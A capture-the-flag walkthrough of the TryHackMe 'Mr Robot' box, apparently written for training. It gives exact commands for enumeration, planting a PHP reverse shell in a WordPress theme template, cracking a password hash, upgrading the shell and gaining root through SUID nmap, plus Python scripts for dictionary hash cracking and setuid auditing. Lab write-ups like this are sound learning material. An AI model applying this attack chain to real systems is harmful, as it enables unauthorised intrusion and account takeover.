Mr Robot


Platform: TryHackMe
Difficulty: Medium
Categories: Linux
Description: Based on the Mr.Robot show, can you root this box?
Attack OS: Parrot Linux
No spoilers!

1. Enumeration: There isn't much to go off of in the questions for this box, so we'll start with
	"nmap -sS -Pn -A -p- -T4 -v $IP", where $IP is set to the IP of the target box (-p- covers all
	65535 TCP ports; -A adds version detection, default scripts and OS guessing). We find that the box
	is running Apache httpd on ports 80 and 443 for http/https, while port 22 (ssh) shows up as closed,
	so the web server is our way in.
[screenshot: nmap scan of Mr Robot box]
 Now we can check the webpage, which has some interesting interactive elements, but what's really
	interesting is the ever useful robots.txt file. It lists two entries: our first key of three,
	and a dictionary file.
[screenshot: first key from robots.txt]
 The dictionary is a wordlist, so we can feed it to gobuster in dir mode to find some new
	directories (deduplicate it first; it is huge and mostly repeats, and gobuster would request each
	duplicate again). The /license endpoint returns a 200, and on view it pokes some fun at you, expecting
	you to turn around, but let's take a look at the source anyway. A good look reveals an encoded string
	well below the visible text; decoding it gives us a username and password. Let's see if we can find a
	login page. /image brings us to a wordpress site that the credentials work on, giving us access to the
	admin panel. Here we can edit some things, so let's try to get a php shell embedded and maybe get a
	foothold. The media upload won't accept a php file, but we still have permission to edit theme files
	(Appearance > Editor). Let's replace the 404.php template with a reverse shell, start a listener
	(nc -lvnp <port>), and trigger it by requesting a page that doesn't exist so wordpress serves the 404
	template to us.
[screenshot: reverse shell foothold via 404 template]
2. Exploitation and Foothold: The php shell worked and we now have a connection on our listener. We are
	running as the daemon user and can poke around the system, starting with ls /home. Robot's home
	folder has our next key, but it is readable only by robot. However, this user has left a password hash
	in the same directory that anyone can read. Let's crack it offline and su to robot (su needs a real
	tty, so if it complains, upgrade the shell first as described in step 3). With key #2 grabbed it's time
	to root.
[screenshot: cracking robot's password and grabbing key 2]
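The offline cracking step above, as an added example that is not the writeup's own code: the hash file is parsed in the common user:hash form, the algorithm is guessed from the bare hex digest's length (unsalted md5, sha1, sha256 or sha512), and a wordlist is hashed and compared. The hash file (user robot, md5 of "abc123") and the wordlist are constructed here; the box's real hash is not reproduced.

```python
"""Offline dictionary attack against an unsalted hash, as an added example
for step 2 (not the writeup's own code).  The hash file, target hash and
wordlist below are constructed; the box's real hash is not reproduced."""
import hashlib

# Bare hex digests of these lengths come from these unsalted algorithms.
ALGOS_BY_LEN = {32: ("md5",), 40: ("sha1",), 64: ("sha256",), 128: ("sha512",)}

# Constructed hash file in "user:hash" form; the target is md5("abc123").
SAMPLE_HASH_FILE = "robot:" + hashlib.md5(b"abc123").hexdigest() + "\n"

# Constructed second target to show the length-based algorithm guess.
SAMPLE_SHA256 = hashlib.sha256(b"letmein").hexdigest()

# Constructed wordlist; the right word sits in the middle, and one repeats.
SAMPLE_WORDS = ["password", "letmein", "abc123", "qwerty", "abc123"]


def parse_hash_file(text):
    """Yield (user, hexdigest) for each 'user:hash' or bare 'hash' line."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, sep, digest = line.rpartition(":")
        yield (user if sep else "", digest.lower())


def guess_algorithms(hexdigest):
    """Map a bare hex digest to the unsalted algorithms that produce its length.
    Anything that is not pure hex (a salted or encoded format) gets no guess."""
    if not hexdigest or any(c not in "0123456789abcdef" for c in hexdigest):
        return ()
    return ALGOS_BY_LEN.get(len(hexdigest), ())


def crack(hexdigest, words, algorithms=None):
    """Hash every word under each candidate algorithm until one matches.
    Returns (algorithm, word) or None.  Each (algorithm, word) pair is tried
    once, so a duplicated wordlist costs nothing extra."""
    target = hexdigest.strip().lower()
    tried = set()
    for algo in algorithms or guess_algorithms(target):
        for word in words:
            word = word.rstrip("\r\n")
            if (algo, word) in tried:
                continue
            tried.add((algo, word))
            if hashlib.new(algo, word.encode("utf-8")).hexdigest() == target:
                return algo, word
    return None


def crack_file(text, words):
    """Crack every entry in a hash file; returns {user: (algo, word) or None}."""
    return {user: crack(digest, words) for user, digest in parse_hash_file(text)}


if __name__ == "__main__":
    for user, hit in crack_file(SAMPLE_HASH_FILE, SAMPLE_WORDS).items():
        print(user, "->", hit)
```

On a real engagement the same attack is a one-liner with the standard tools, for example john --format=raw-md5 --wordlist=words.txt hash.txt or hashcat -m 0 hash.txt words.txt; the script above just makes the length-to-algorithm guess and the compare loop explicit.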
3. Escalation: Now comfortably on the system, let's get a better shell with the help of python and run
	python -c 'import pty;pty.spawn("/bin/bash")'. Now let's look for executables with the SUID bit set:
	find / -perm /4000 -type f 2>/dev/null. nmap has the SUID bit set, so let's try to escalate through it.
	GTFOBins comes to the rescue again: nmap --interactive followed by !bash gets us root (if your bash
	drops the setuid privilege and you land back as robot, use !sh or !bash -p instead). Interactive mode
	only exists in older nmap releases, which is why this old box is open to it.
[screenshot: SUID nmap and GTFObins escalation path]
 Finally, cd to /root for the last key.
[screenshot: root flag, key 3]
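The SUID hunt in step 3, as an added example that is not the writeup's own code: a walk over the filesystem that does what find / -perm /4000 2>/dev/null does, plus a classifier that separates setuid binaries with a known GTFOBins escape (the reason nmap jumps out here) from the ones a stock Linux install is expected to have, and from unknown ones that deserve a manual look. The GTFOBins and baseline sets are short subsets chosen for illustration, not the full catalogues, and the sample entries are constructed.

```python
"""Audit of setuid binaries, as an added example for step 3 (not the writeup's
own code).  The GTFOBins and baseline sets below are short, illustrative
subsets chosen here, not the full catalogues; the sample entries are constructed."""
import os
import stat

# Setuid-capable binaries with a known GTFOBins shell escape (partial list).
GTFOBINS_SUID = {
    "nmap", "find", "vim", "vi", "bash", "sh", "python", "python2", "python3",
    "perl", "php", "ruby", "less", "more", "awk", "env", "cp", "mv", "tar", "nano",
}

# Binaries that are setuid on a stock Linux install and expected to be.
BASELINE_SUID = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount",
    "umount", "ping", "ping6", "pkexec", "fusermount", "fusermount3",
}

# Constructed sample as (path, st_mode) pairs; 0o104755 = regular file, setuid.
SAMPLE_ENTRIES = [
    ("/usr/local/bin/nmap", 0o104755),
    ("/usr/bin/sudo", 0o104755),
    ("/bin/ls", 0o100755),
    ("/opt/backup/helper", 0o104755),
]


def classify_suid(entries):
    """Split (path, mode) pairs into setuid binaries worth a GTFOBins lookup,
    expected stock ones, and unknown ones that deserve a manual look.
    Non-setuid files are ignored."""
    report = {"interesting": [], "baseline": [], "other": []}
    for path, mode in entries:
        if not mode & stat.S_ISUID:
            continue
        name = os.path.basename(path)
        if name in GTFOBINS_SUID:
            report["interesting"].append(path)
        elif name in BASELINE_SUID:
            report["baseline"].append(path)
        else:
            report["other"].append(path)
    return report


def walk_modes(root="/"):
    """Yield (path, st_mode) for every regular file under root, silently
    skipping what we cannot read: the `find / -perm /4000 2>/dev/null` walk."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable, same as find's 2>/dev/null
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode


if __name__ == "__main__":
    report = classify_suid(walk_modes("/"))
    for bucket in ("interesting", "other", "baseline"):
        for path in report[bucket]:
            print(f"{bucket:<12} {path}")
```

The "other" bucket is the one that matters on the defensive side: a custom setuid binary in /opt or a setuid copy of a tool outside its usual path is exactly the kind of thing a file-integrity baseline should flag, and on the attacking side it is the first thing to read and try.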
	Another box in the books!
[screenshot: room completed]